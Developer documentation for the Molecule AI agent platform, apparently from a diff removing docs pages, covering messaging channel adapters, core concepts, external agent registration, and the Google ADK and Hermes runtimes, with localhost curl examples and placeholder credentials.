<Callout type="info">
Discord does not support bot-initiated long-polling. Inbound messages only work via slash commands registered in your Discord Application. If you only need outbound (workspace → Discord), no Application setup is required — just add the webhook URL.
</Callout>
---
### Lark / Feishu
Outbound via Custom Bot webhooks, inbound via Event Subscriptions.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `webhook_url` | string | Custom Bot webhook URL. Must start with `https://open.feishu.cn/open-apis/bot/v2/hook/` or `https://open.larksuite.com/open-apis/bot/v2/hook/`. |
**Optional config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `verify_token` | string | Verification Token from the app's Event Subscriptions page. When set, inbound events with a mismatching token are rejected. |
**Features:**
- Both China (`open.feishu.cn`) and international (`open.larksuite.com`) endpoints supported
- `url_verification` handshake with constant-time `verify_token` comparison
- v2 event payload parsing (`im.message.receive_v1`)
- Token verification on both `url_verification` and `event_callback` payloads
- Application-level error codes checked (Lark returns HTTP 200 even for app errors)
---
## Setup Flow
### 1. Create a Channel
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz",
"chat_id": "-1001234567890"
}
}'
```
### 2. Test the Connection
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels/{channelId}/test \
-H "Authorization: Bearer {token}"
```
### 3. Send a Message
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels/{channelId}/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"text": "Hello from the agent!"}'
```
---
## Inbound Webhooks
Register your platform's public URL as the webhook endpoint for each social
platform. Inbound messages arrive at:
```
POST /webhooks/:type
```
where `:type` is `telegram`, `slack`, `discord`, or `lark`. The platform:
1. Looks up all channels of that type
2. Calls the adapter's `ParseWebhook` to extract a standardized `InboundMessage`
3. Checks the allowlist (if configured)
4. Forwards the message to the workspace via A2A `message/send`
For Telegram, the platform can also use long-polling instead of webhooks,
started automatically when a Telegram channel is created.
For Discord, the platform automatically handles type-1 PING interactions (required by Discord for endpoint verification) and forwards type-2 and type-3 interaction payloads to the workspace.
---
## Discover Chats
Auto-detect available chats for a bot token before creating a channel:
```bash
curl -X POST http://localhost:8080/channels/discover \
-H "Content-Type: application/json" \
-d '{"type": "telegram", "bot_token": "123456789:ABCdef..."}'
```
Returns the bot username, discovered chats (with IDs, names, and types), and
whether the bot can read all group messages (Telegram privacy mode).
---
## Allowlists
Each channel row has an `allowed_users` JSONB array. When non-empty, only
messages from users whose IDs appear in the list are forwarded to the workspace.
All others are silently dropped.
---
## Config Encryption
Sensitive config fields (like `bot_token`) are encrypted at rest. The `List`
endpoint decrypts them server-side and masks tokens in the response
(showing only the first 4 and last 4 characters).
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/channels/adapters` | List available adapter types |
| POST | `/channels/discover` | Auto-detect chats for a bot token |
| GET | `/workspaces/:id/channels` | List channels for a workspace |
| POST | `/workspaces/:id/channels` | Add a channel |
| PATCH | `/workspaces/:id/channels/:channelId` | Update a channel |
| DELETE | `/workspaces/:id/channels/:channelId` | Remove a channel |
| POST | `/workspaces/:id/channels/:channelId/test` | Test connection |
| POST | `/workspaces/:id/channels/:channelId/send` | Send outbound message |
| POST | `/webhooks/:type` | Incoming social webhook |
---
## Example Configs
### Telegram
```json
{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz_1234",
"chat_id": "-1001234567890"
}
}
```
Multiple chats (comma-separated):
```json
{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz_1234",
"chat_id": "-1001234567890, -1009876543210"
}
}
```
### Slack
```json
{
"type": "slack",
"config": {
"webhook_url": "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
}
}
```
### Discord
```json
{
"type": "discord",
"config": {
"webhook_url": "https://discord.com/api/webhooks/1234567890123456789/abcdefGHIjklmnopQRSTuvwxyz_1234"
}
}
```
### Lark / Feishu
```json
{
"type": "lark",
"config": {
"webhook_url": "https://open.larksuite.com/open-apis/bot/v2/hook/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
"verify_token": "your-verification-token"
}
}
```
China endpoint:
```json
{
"type": "lark",
"config": {
"webhook_url": "https://open.feishu.cn/open-apis/bot/v2/hook/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
}
}
```

View File

@ -1,216 +0,0 @@
---
title: Concepts
description: The core primitives that compose every Molecule AI org — workspaces, plugins, channels, schedules, tokens, external agents, and the canvas.
---
## Workspaces
A **workspace** is a real Docker container running a real LLM agent. Each
workspace has:
- A **role** (a one-line job description fed into its system prompt — also
written to `/workspace/AGENTS.md` so peers can discover it)
- An **initial prompt** (run once at first boot — typically clone repo,
read docs, memorise context)
- A **runtime** (`claude-code`, `langgraph`, `crewai`, `autogen`, `deepagents`,
`openclaw`, `hermes`, `gemini-cli`, [`google-adk`](/docs/google-adk))
- A **tier** (resource budget — T1 sandboxed, T2 standard, T3 privileged, T4 full-host)
- An optional **parent** (forms the org tree)
- An optional **workspace_dir** (a host path bind-mounted into the
container — gives the agent direct access to your codebase)
- An optional **budget_limit** (workspace-level spend cap — see [Workspace budgets](#workspace-budgets) below)
Workspaces talk to each other via **A2A** (agent-to-agent) messages, routed
by the platform. Communication rules: same workspace, siblings, and
parent/child are allowed; everything else is denied.
See the [API Reference](/docs/api-reference#budget) for the full endpoint specification.
### Workspace status lifecycle
| Status | Meaning | Resumes via |
|--------|---------|-------------|
| `provisioning` | Container being started | automatic |
| `online` | Running and accepting tasks | — |
| `degraded` | Heartbeat `error_rate > 0.5` | auto-recovers |
| `offline` | Missed heartbeats (liveness sweep) | auto-restart |
| `paused` | Manually stopped via `/pause` | `POST /resume` |
| `hibernated` | Auto-paused after idle timeout (or via `/hibernate`) | automatic on next A2A message |
| `removed` | Deleted | — |
**Hibernation** is an opt-in automatic cost-saving mode. Set `hibernation_idle_minutes` in the workspace's `config.yaml` to enable it. When a hibernated workspace receives an A2A message, the platform wakes it automatically (returning `503 Retry-After: 15` while it comes online). See [API Reference — Lifecycle](/docs/api-reference#lifecycle) for the `/hibernate` endpoint and configuration details.
## External agents
An **external agent** is a workspace with `runtime: external` — it runs on
your own infrastructure instead of the platform's Docker network. External
agents:
- Register via `POST /registry/register` and receive a bearer token
- Send heartbeats every 30 seconds to stay online
- Accept A2A messages at their registered URL
- Appear on the canvas with a purple **REMOTE** badge
- Skip Docker health sweep (liveness is heartbeat-only)
See [External Agents](/docs/external-agents) for the full registration guide.
## Plugins
A **plugin** is a bundle of capabilities a workspace can install:
- **Hooks** — `PreToolUse`, `PostToolUse`, `UserPromptSubmit` — for
guardrails, audit trails, dangerous-command refusal
- **Skills** — multi-criteria code review, cross-vendor adversarial
review, LLM-as-judge gates
- **Slash commands** — `/triage`, `/retro`, etc.
- **MCP servers** — bring in tools the model can call
Plugins have two axes: **source** (where to fetch — `local://`, `github://`)
and **shape** (what's inside — agentskills.io format, MCP server, etc.).
Plugins compose. Per-workspace plugin lists **UNION** with the org-wide
defaults — adding one capability to one role doesn't require re-listing
every default. Use `!plugin-name` to opt a specific default out.
See [Plugins](/docs/plugins) for the full guide.
## Channels
A **channel** wires a workspace to an external messaging platform:
| Adapter | Platform | Config |
|---------|----------|--------|
| `telegram` | Telegram | Bot token + chat_id allowlist |
| `slack` | Slack | Workspace token + channel |
| `lark` | Lark / Feishu | Custom Bot webhook + Event Subscriptions |
Once connected, users can talk to agents from outside the canvas — and
agents can broadcast back. Inbound messages arrive via webhook and are
routed to the workspace as A2A messages.
See [Channels](/docs/channels) for setup instructions.
## Schedules
A **schedule** is a cron-driven recurring prompt. Each tick fires an A2A
message into the workspace, which the agent treats as a new task. Schedules
are supervised — panics in the dispatch path are recovered with exponential
backoff, and a liveness watchdog surfaces stuck subsystems via
`/admin/liveness`.
Schedules let you build the *evolution* loop: hourly security audits,
daily ecosystem watches, weekly plugin curation, etc.
See [Schedules](/docs/schedules) for the full guide.
## Tokens
**Bearer tokens** authenticate agents and API clients. Each token is
scoped to a single workspace — a token from workspace A cannot access
workspace B.
- Issued on first registration (`POST /registry/register`)
- Create/list/revoke via `GET/POST/DELETE /workspaces/:id/tokens`
- 256-bit entropy, sha256-hashed in DB, plaintext shown once
See [Token Management](/docs/tokens) for the full guide.
## The canvas
The **canvas** is a Next.js 15 React Flow visualisation of your org.
Every workspace is a node. Every A2A message is an edge. Every memory
write, every scheduled fire, every status change pushes a WebSocket
event in real time.
The canvas isn't just a viewer — it's the operator surface. Drag nodes
to reorganise teams, click to chat, right-click for actions, watch the
team work in real time.
### A2A Topology Overlay
The canvas renders **live delegation edges** on top of the workspace graph.
When one agent delegates to another, a directed edge appears:
- **Animated violet** — delegation occurred within the last 5 minutes
- **Static blue** — delegation occurred earlier
The overlay polls `GET /workspaces/:id/activity?type=delegation` for every
visible node every 60 seconds. Toggle it on/off with the **A2A** button in
the toolbar (⊞ mesh icon) — the setting persists across page loads.
### Audit Trail Panel
Every workspace's **Side Panel → Audit** tab (⊟ ledger icon) shows the
workspace's tamper-evident audit ledger via `GET /workspaces/:id/audit`.
Each entry records what happened (event type, actor, outcome) and whether
its hash chain is intact.
| Event type | Colour | Meaning |
|-----------|--------|---------|
| `delegation` | Blue | An A2A delegation was made or received |
| `decision` | Violet | A gate or approval decision was recorded |
| `gate` | Yellow | A HITL or automated gate was evaluated |
| `hitl` | Orange | A human-in-the-loop approval request |
Entries with `chain_valid: false` display a red ⚠ tamper indicator —
investigate immediately; the audit chain may have been modified offline.
Use the event-type filter bar at the top of the panel to narrow results.
Click **Load more** to paginate (cursor-based, 50 entries per page).
### Memory Inspector panel
The **Memory Inspector** (Side Panel → Memory tab, 🧠 icon) lets you browse, search, and inspect all `LOCAL` and `TEAM` memory keys for any workspace — live, without leaving the canvas.
- **Browse** — all memory keys for the selected workspace, grouped by HMA scope (`LOCAL`, `TEAM`)
- **Semantic search** — enter a query to run `GET /workspaces/:id/memories?q=<query>` against the vector index; results are colour-coded by cosine similarity score
- **Inspect** — click any key to expand its full value and metadata (`created_at`, scope, last writer)
The inspector polls on workspace selection change and on each heartbeat. Changes from agents running in parallel appear within one heartbeat cycle (~15s).
## How they fit together
A typical org definition:
```yaml
org_name: My Team
defaults:
runtime: claude-code
tier: 2
plugins: [ecc, molecule-dev, superpowers, molecule-careful-bash]
category_routing:
security: [Backend Engineer]
ui: [Frontend Engineer]
workspaces:
- name: PM
role: "Product manager — triages issues, reviews PRs, unblocks the team."
canvas: { x: 400, y: 50 }
plugins: [molecule-workflow-triage]
channels:
- type: telegram
config: { bot_token: "${TELEGRAM_BOT_TOKEN}", chat_id: "12345" }
children:
- name: Dev Lead
role: "Tech lead — coordinates engineering sub-teams and owns architecture."
children:
- name: Frontend Engineer
role: "Frontend specialist — React, TypeScript, Canvas UI."
- name: Backend Engineer
role: "Backend specialist — Go platform, API, migrations, CI."
schedules:
- name: Hourly typecheck
cron_expr: "0 * * * *"
prompt: "Run npm run typecheck and report any new errors..."
```
That's the mental model. Templates → plugins → channels → schedules →
tokens → canvas. Everything else in the docs is depth on one of these
primitives.
## MCP integration
Any MCP-compatible AI agent can manage Molecule AI workspaces using the
[MCP Server](/docs/mcp-server) — 87 tools covering workspace CRUD,
communication, secrets, memory, files, schedules, channels, plugins,
and more. Install via `npx @molecule-ai/mcp-server`.

View File

@ -1,239 +0,0 @@
---
title: External Agents
description: Register agents running outside the platform's Docker network as first-class workspaces on the canvas.
---
External agents are AI agents running on your own infrastructure — a different
cloud, an edge device, or your laptop — that join the Molecule AI canvas as
first-class workspaces. They communicate with other agents via A2A, appear on
the canvas with a purple **REMOTE** badge, and are managed like any other workspace.
## Prerequisites
- A running Molecule AI platform (default `http://localhost:8080`)
- Your agent must expose an HTTP endpoint that accepts A2A JSON-RPC messages
## Step 1 — Create the workspace
```bash
curl -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "My External Agent",
"external": true,
"url": "https://my-agent.example.com",
"tier": 2
}'
```
The response includes the workspace `id`. Save it.
<Callout type="warn">
URLs must be publicly reachable. Private IPs (10.x, 172.16.x, 192.168.x, 127.x,
169.254.x) are rejected for SSRF protection.
</Callout>
## Step 2 — Register with the platform
```bash
curl -X POST http://localhost:8080/registry/register \
-H "Content-Type: application/json" \
-d '{
"workspace_id": "<id-from-step-1>",
"url": "https://my-agent.example.com",
"agent_card": {
"name": "My Agent",
"description": "Research assistant",
"skills": ["research", "analysis"],
"runtime": "external"
}
}'
```
The response includes `auth_token` — **save this immediately**, it is shown only
once and cannot be recovered.
## Step 3 — Start the heartbeat loop
Send a heartbeat every 30 seconds to keep your workspace online:
```bash
curl -X POST http://localhost:8080/registry/heartbeat \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <auth_token>" \
-d '{
"workspace_id": "<id>",
"status": "online",
"active_tasks": 0,
"current_task": "",
"error_rate": 0.0,
"uptime_seconds": 3600
}'
```
If the heartbeat stops for 60 seconds, the workspace automatically goes offline.
## Step 4 — Handle incoming A2A messages
Your agent must accept POST requests at the registered URL with A2A JSON-RPC format:
```json
{
"jsonrpc": "2.0",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"type": "text", "text": "Hello from another agent"}]
}
},
"id": "req-123"
}
```
Respond with a JSON-RPC result:
```json
{
"jsonrpc": "2.0",
"result": {
"status": "completed",
"artifacts": [
{
"parts": [{"type": "text", "text": "Hello back!"}]
}
]
},
"id": "req-123"
}
```
## Step 5 — Send messages to other agents
```bash
curl -X POST http://localhost:8080/workspaces/<target-id>/a2a \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-workspace-id>" \
-d '{
"jsonrpc": "2.0",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"type": "text", "text": "Can you help with this?"}]
}
},
"id": "msg-001"
}'
```
## Step 6 — Discover peers
```bash
# Your workspace info
curl http://localhost:8080/registry/discover/<your-id> \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-id>"
# Find siblings/parent/child workspaces
curl http://localhost:8080/registry/<your-id>/peers \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-id>"
```
## Communication rules
| Relationship | Allowed? |
|---|---|
| Same workspace | Yes |
| Siblings (same parent) | Yes |
| Parent to child | Yes |
| Child to parent | Yes |
| Root-level siblings | Yes |
| Everything else | No |
## Python example
```python
import requests
import threading
import time
from flask import Flask, request, jsonify
PLATFORM = "http://localhost:8080"
# 1. Create workspace
ws = requests.post(f"{PLATFORM}/workspaces", json={
"name": "Python Research Agent",
"external": True,
"url": "http://my-host:5000",
"tier": 2,
}).json()
WS_ID = ws["id"]
# 2. Register
reg = requests.post(f"{PLATFORM}/registry/register", json={
"workspace_id": WS_ID,
"url": "http://my-host:5000",
"agent_card": {
"name": "Python Research Agent",
"skills": ["research"],
"runtime": "external",
},
}).json()
TOKEN = reg["auth_token"]
HEADERS = {"Authorization": f"Bearer {TOKEN}"}
# 3. Heartbeat loop
def heartbeat():
while True:
requests.post(f"{PLATFORM}/registry/heartbeat",
json={"workspace_id": WS_ID, "active_tasks": 0},
headers=HEADERS)
time.sleep(30)
threading.Thread(target=heartbeat, daemon=True).start()
# 4. A2A endpoint
app = Flask(__name__)
@app.route("/", methods=["POST"])
def handle_a2a():
data = request.json
text = data["params"]["message"]["parts"][0]["text"]
return jsonify({
"jsonrpc": "2.0",
"result": {
"status": "completed",
"artifacts": [{"parts": [{"type": "text", "text": f"Received: {text}"}]}],
},
"id": data["id"],
})
app.run(host="0.0.0.0", port=5000)
```
## Canvas appearance
External workspaces appear on the canvas with a purple **REMOTE** badge.
They support drag-and-drop positioning, nesting into teams, real-time status
updates via heartbeat, and chat via A2A messages.
## Lifecycle
```
create (POST /workspaces) → online (register) → offline (heartbeat expires)
→ removed (deleted)
```
- External workspaces skip Docker health sweep — only heartbeat TTL matters
- No auto-restart (agent manages its own process)
- Paused external workspaces skip heartbeat monitoring
## Security
- Bearer token required on all authenticated endpoints
- Tokens are 256-bit random, sha256-hashed — only the hash is stored
- Token shown once at registration, never recoverable
- See [Token Management](/docs/tokens) for create/list/revoke API

View File

@ -1,311 +0,0 @@
---
title: Google ADK Runtime
description: Run Molecule AI workspaces on Google's Agent Development Kit (ADK) — Gemini-native agents with sequential, parallel, and loop workflows.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Google ADK Runtime
The `google-adk` runtime adapter integrates [Google's Agent Development Kit](https://github.com/google/adk-python) (v1.0+, Apache-2.0) into Molecule AI workspaces. ADK is Google's production-grade Python framework for building AI agents backed by Gemini models, with built-in support for sequential, parallel, and loop execution patterns.
<Callout type="info">
Google ADK adapter was added in PR #550 (issue #542). It passes 46/46 tests with 100% coverage.
</Callout>
---
## When to use Google ADK vs other runtimes
| | Google ADK | LangGraph | AutoGen |
|---|---|---|---|
| **Best for** | Gemini-native agents, Google Cloud integrations | Complex stateful graphs, fine-grained flow control | Multi-agent dialogue and code-execution workflows |
| **Model family** | Gemini (gemini-2.0-flash, gemini-1.5-pro, …) | Any LangChain-supported model | Any AutoGen-supported model |
| **Execution model** | Sequential / Parallel / Loop built-in | Explicit graph with nodes and edges | Conversation-driven, agents negotiate through dialogue |
| **Tool support** | Google-native + LangChain tools | LangChain tools | Python functions, code execution |
| **State persistence** | ADK SessionService | LangGraph checkpointer | In-process conversation history |
| **Google Cloud fit** | First-class | Via LangChain integrations | Via plugin |
**Choose Google ADK when:**
- Your workload is Google Cloudnative (Vertex AI, Cloud Tools, Google Workspace)
- You want Gemini models with minimal adapter overhead
- You prefer ADK's opinionated sequential/parallel/loop composition over explicit graph edges
- You're building agents that call Google APIs (Maps, Search, Drive, etc.)
---
## Installation
Each Molecule AI workspace template is a standalone Docker image. The Google ADK workspace template (`molecule-ai-workspace-template-google-adk`) ships with the adapter pre-configured. To use it, set the runtime in your workspace `config.yaml`:
```yaml title="config.yaml"
runtime: google-adk
model: google:gemini-2.0-flash
```
If you are building a custom image on top of `molecule-ai-workspace-runtime`, add the adapter dependency to your `requirements.txt`:
```text title="requirements.txt"
molecule-ai-workspace-runtime>=0.1.0
google-adk>=1.0.0
```
Install manually with pip:
```bash
pip install google-adk
```
<Callout type="warn">
Google ADK requires **Python 3.10+**. Ensure your workspace Dockerfile uses `python:3.11-slim` or newer.
</Callout>
---
## Secrets
The adapter reads your Google credentials from workspace secrets. Set these before starting a Google ADK workspace:
| Secret key | Required | Purpose |
|---|---|---|
| `GOOGLE_API_KEY` | Yes (unless using Vertex AI) | Gemini API key from [Google AI Studio](https://aistudio.google.com/app/apikey) |
| `GOOGLE_CLOUD_PROJECT` | Vertex AI only | GCP project ID |
| `GOOGLE_CLOUD_LOCATION` | Vertex AI only | Region (e.g. `us-central1`) |
| `GOOGLE_GENAI_USE_VERTEXAI` | Vertex AI only | Set to `true` to route via Vertex AI instead of the public API |
Set secrets via the canvas Settings panel or the API:
```bash
curl -X PUT http://localhost:8080/settings/secrets \
-H 'Content-Type: application/json' \
-d '{"key":"GOOGLE_API_KEY","value":"AIza..."}'
```
---
## Quickstart
Once you have set `GOOGLE_API_KEY` (see [Secrets](#secrets) above), these steps take you from zero to a running workspace with a working multi-turn conversation:
```bash
# 1. Create a google-adk workspace
WS=$(curl -s -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "adk-agent",
"role": "Google ADK inference worker",
"runtime": "google-adk",
"model": "google:gemini-2.0-flash"
}' | jq -r '.id')
echo "Workspace: $WS"
# 2. Wait for ready (~30s)
until curl -s http://localhost:8080/workspaces/$WS \
| jq -r '.status' | grep -q ready; do
echo "Waiting..."; sleep 5
done
# 3. Send your first task
curl -s -X POST http://localhost:8080/workspaces/$WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": "1",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"kind": "text", "text": "Summarise the ADK architecture in 3 bullet points."}]
}
}
}' | jq '.result.parts[0].text'
# 4. Multi-turn — session state is preserved across calls
curl -s -X POST http://localhost:8080/workspaces/$WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": "2",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"kind": "text", "text": "Now give me a one-line TL;DR of what you just said."}]
}
}
}' | jq '.result.parts[0].text'
# 5. Vertex AI alternative — set these instead of GOOGLE_API_KEY
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_GENAI_USE_VERTEXAI","value":"1"}'
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_CLOUD_PROJECT","value":"my-gcp-project"}'
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_CLOUD_LOCATION","value":"us-central1"}'
```
**How session state works:** the adapter maps each A2A `context_id` to an `InMemorySessionService` session. State is isolated per context and persists across calls within the same session — so the agent in step 4 recalls the answer from step 3 without any orchestrator history management. To persist sessions across workspace restarts, set `session_db_url` in `runtime_config` (see [Configuration reference](#configuration-reference)).
**Model prefix stripping:** the adapter strips the `google:` prefix before passing the model name to ADK — `google:gemini-2.0-flash` becomes `gemini-2.0-flash`. Always use the `google:` prefix in your workspace config; the adapter handles the rest.
---
## Basic usage
### Minimal `config.yaml`
```yaml title="config.yaml"
name: My ADK Agent
runtime: google-adk
model: google:gemini-2.0-flash
role: |
You are a helpful assistant. Answer questions clearly and concisely.
tier: 2
```
### With runtime configuration
```yaml title="config.yaml"
name: Research Agent
runtime: google-adk
model: google:gemini-1.5-pro
role: |
You are a research specialist. Gather and synthesise information from multiple sources.
tier: 2
runtime_config:
max_iterations: 20
enable_code_execution: true
temperature: 0.3
```
### Org template example
```yaml title="org-template/org.yaml"
org_name: Research Team
defaults:
runtime: google-adk
model: google:gemini-2.0-flash
tier: 2
workspaces:
- name: Research Lead
role: Coordinate research tasks and synthesise findings from your team.
children:
- name: Web Researcher
role: Search the web and extract relevant information.
runtime_config:
enable_code_execution: false
- name: Data Analyst
role: Analyse datasets and produce statistical summaries.
runtime_config:
enable_code_execution: true
```
---
## Configuration reference
All options go under `runtime_config:` in `config.yaml`.
| Option | Type | Default | Description |
|---|---|---|---|
| `max_iterations` | integer | `10` | Maximum agent reasoning steps per turn |
| `temperature` | float | `0.0` | Sampling temperature passed to the Gemini model (0.02.0) |
| `enable_code_execution` | boolean | `false` | Allow the agent to execute Python code via ADK's built-in code-execution tool |
| `output_key` | string | `"output"` | Key in the ADK session state that holds the agent's final response |
| `session_db_url` | string | `null` | SQLite or Postgres URL for ADK session persistence across restarts. If null, uses in-memory session storage. |
---
## Tools and plugins
The Google ADK adapter is fully compatible with Molecule AI's plugin system. Plugins installed in a workspace are injected into the ADK agent's tool list via the runtime's plugin registry.
**Supported plugin shapes with Google ADK:**
| Plugin shape | Supported | Notes |
|---|---|---|
| MCP server | Yes | Tools exposed via MCP are wrapped as ADK `FunctionTool` instances |
| Skill files | Yes | Skills are injected into the system prompt |
| Hook scripts | Yes | `PreToolUse` / `PostToolUse` / `UserPromptSubmit` hooks fire normally |
| Slash commands | Yes | Commands are routed through the workspace A2A server as usual |
Example: adding the `superpowers` plugin to a Google ADK workspace:
```yaml title="config.yaml"
runtime: google-adk
model: google:gemini-2.0-flash
plugins:
- superpowers
- molecule-dev
```
---
## A2A communication
Google ADK workspaces participate in the full Molecule AI A2A network — they can receive tasks from parent agents, delegate to children, and send messages to siblings — identically to any other runtime.
The adapter injects the standard A2A MCP tools (`list_peers`, `delegate_task`, `delegate_task_async`, `send_message_to_user`, `commit_memory`, `recall_memory`) into the ADK agent's tool list automatically.
---
## Transcript support
The Google ADK adapter exposes live session transcripts to the canvas "look over shoulder" view. Each agent turn (tool calls, model responses) is streamed as it completes.
---
## Comparison: config.yaml across runtimes
<br />
```yaml title="LangGraph workspace"
runtime: langgraph
model: anthropic:claude-opus-4-7
```
```yaml title="AutoGen workspace"
runtime: autogen
model: openai:gpt-4o
```
```yaml title="Google ADK workspace"
runtime: google-adk
model: google:gemini-2.0-flash
runtime_config:
temperature: 0.1
```
The `model` field follows `<provider>:<model-id>` format. For Google ADK, the `google:` prefix routes through the `google-genai` LangChain integration.
---
## Troubleshooting
### `google.api_core.exceptions.InvalidArgument: 400 API key not valid`
Your `GOOGLE_API_KEY` secret is missing or invalid. Check it in the canvas Settings panel and verify it in [Google AI Studio](https://aistudio.google.com/app/apikey).
### `RuntimeError: google-adk is not installed`
The workspace image is missing the `google-adk` Python package. If you are using a custom image, ensure `requirements.txt` includes `google-adk>=1.0.0` and rebuild the image.
### Agent returns empty response after tool calls
Check `max_iterations` in `runtime_config`. If the agent hits the iteration cap mid-task, it returns the last partial result. Increase `max_iterations` or break the task into smaller sub-tasks via A2A delegation.
### Vertex AI 403 Permission Denied
Ensure `GOOGLE_CLOUD_PROJECT`, `GOOGLE_CLOUD_LOCATION`, and `GOOGLE_GENAI_USE_VERTEXAI=true` are all set, and that your service account has the `roles/aiplatform.user` IAM role on the project.
---
## See also
- [Architecture — Workspace Runtime](/docs/architecture#workspace-runtime) — how adapters fit into the runtime
- [Concepts — Workspaces](/docs/concepts#workspaces) — workspace primitives
- [Org Template](/docs/org-template) — deploy a full team from a YAML definition
- [Plugins](/docs/plugins) — extend your ADK agents with hooks, skills, and MCP servers
- [Google ADK Python on GitHub](https://github.com/google/adk-python) — upstream documentation

View File

@ -1,345 +0,0 @@
---
title: Hermes Runtime & Multi-Provider Dispatch
description: Hermes is Molecule AI's built-in inference router. Route tasks to Anthropic, Gemini, or any OpenAI-compatible model through native dispatch paths — with correct multi-turn history on all three.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Hermes Runtime & Multi-Provider Dispatch
Hermes is Molecule AI's built-in inference router powering `runtime: hermes` workspaces. It supports three dispatch paths — a native Anthropic Messages API path, a native Gemini `generateContent` path, and an OpenAI-compatible shim for 13+ other providers — keyed automatically by which API secret is present on the workspace.
Phases 2a through 2e are fully merged to `main`:
- **Phase 2a** (PR #240) — native Anthropic dispatch
- **Phase 2b** (PR #255) — native Gemini dispatch with correct `role: "model"` + `parts` wire format
- **Phase 2c** (PR #267) — correct multi-turn history preserved as turns (not flattened) on all three paths
- **Phase 2d** (PR #499) — stacked system messages (`system_blocks` kwarg) on Anthropic and Gemini paths
- **Phase 2e** (PRs #644, #645) — native `tools=[]` parameter + `response_format=json_schema` structured output on Anthropic native path
<Callout type="info">
**Remaining roadmap:** vision content blocks and streaming on native paths are scoped for a future release.
</Callout>
---
## Dispatch table
Hermes selects an inference path based on which API key is set on the workspace. Keys are resolved in priority order:
> `HERMES_API_KEY` → `OPENROUTER_API_KEY` → `ANTHROPIC_API_KEY` → `GEMINI_API_KEY`
The first key found wins. Don't set `HERMES_API_KEY` if you want native Anthropic or Gemini dispatch — it takes priority and routes through the OpenAI-compat shim.
| Key present | Dispatch path | Provider | Wire format |
|---|---|---|---|
| `ANTHROPIC_API_KEY` | Native Anthropic | Anthropic | Messages API — `{role, content}` |
| `GEMINI_API_KEY` | Native Gemini | Google | `generateContent` — `{role: "model", parts: [{text}]}` |
| `OPENROUTER_API_KEY` / `HERMES_API_KEY` / other | OpenAI-compat shim | 13+ providers | OpenAI Chat Completions |
| None | Error | — | — |
**Fail-loud semantics:** if `ANTHROPIC_API_KEY` is set but the `anthropic` Python package is not installed in the workspace image, Hermes raises a `RuntimeError` immediately — before any inference attempt. Same for `google-genai`. Silent fallback to the compat shim would mask format errors; Hermes fails loudly instead.
---
## Secrets
Set provider keys as global or workspace-level secrets:
```bash
# Native Anthropic dispatch
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-..."}'
# Native Gemini dispatch
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"GEMINI_API_KEY","value":"YOUR-GEMINI-KEY"}'
# OpenAI-compat shim (OpenRouter, Groq, Mistral, etc.)
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"OPENROUTER_API_KEY","value":"sk-or-..."}'
```
To force a specific workspace to use Gemini dispatch when a global `ANTHROPIC_API_KEY` is set, clear the key at the workspace level:
```bash
curl -X PUT http://localhost:8080/workspaces/$GEMINI_WS/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":""}'
```
---
## Quickstart
### Native Anthropic dispatch
```bash
export MOLECULE_API=http://localhost:8080
# 1. Store your Anthropic key
curl -s -X PUT $MOLECULE_API/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-YOUR-KEY"}' | jq .
# 2. Create a Hermes workspace
ANTHROPIC_WS=$(curl -s -X POST $MOLECULE_API/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "hermes-anthropic",
"role": "Inference worker — native Anthropic path",
"runtime": "hermes",
"model": "anthropic:claude-sonnet-4-5"
}' | jq -r '.id')
# 3. Wait for ready
until curl -s $MOLECULE_API/workspaces/$ANTHROPIC_WS \
| jq -r '.status' | grep -q ready; do sleep 5; done
# 4. Confirm dispatch path
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"probe-1","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"Which provider API are you calling to generate this response?"}]}}
}' | jq '.result.parts[0].text'
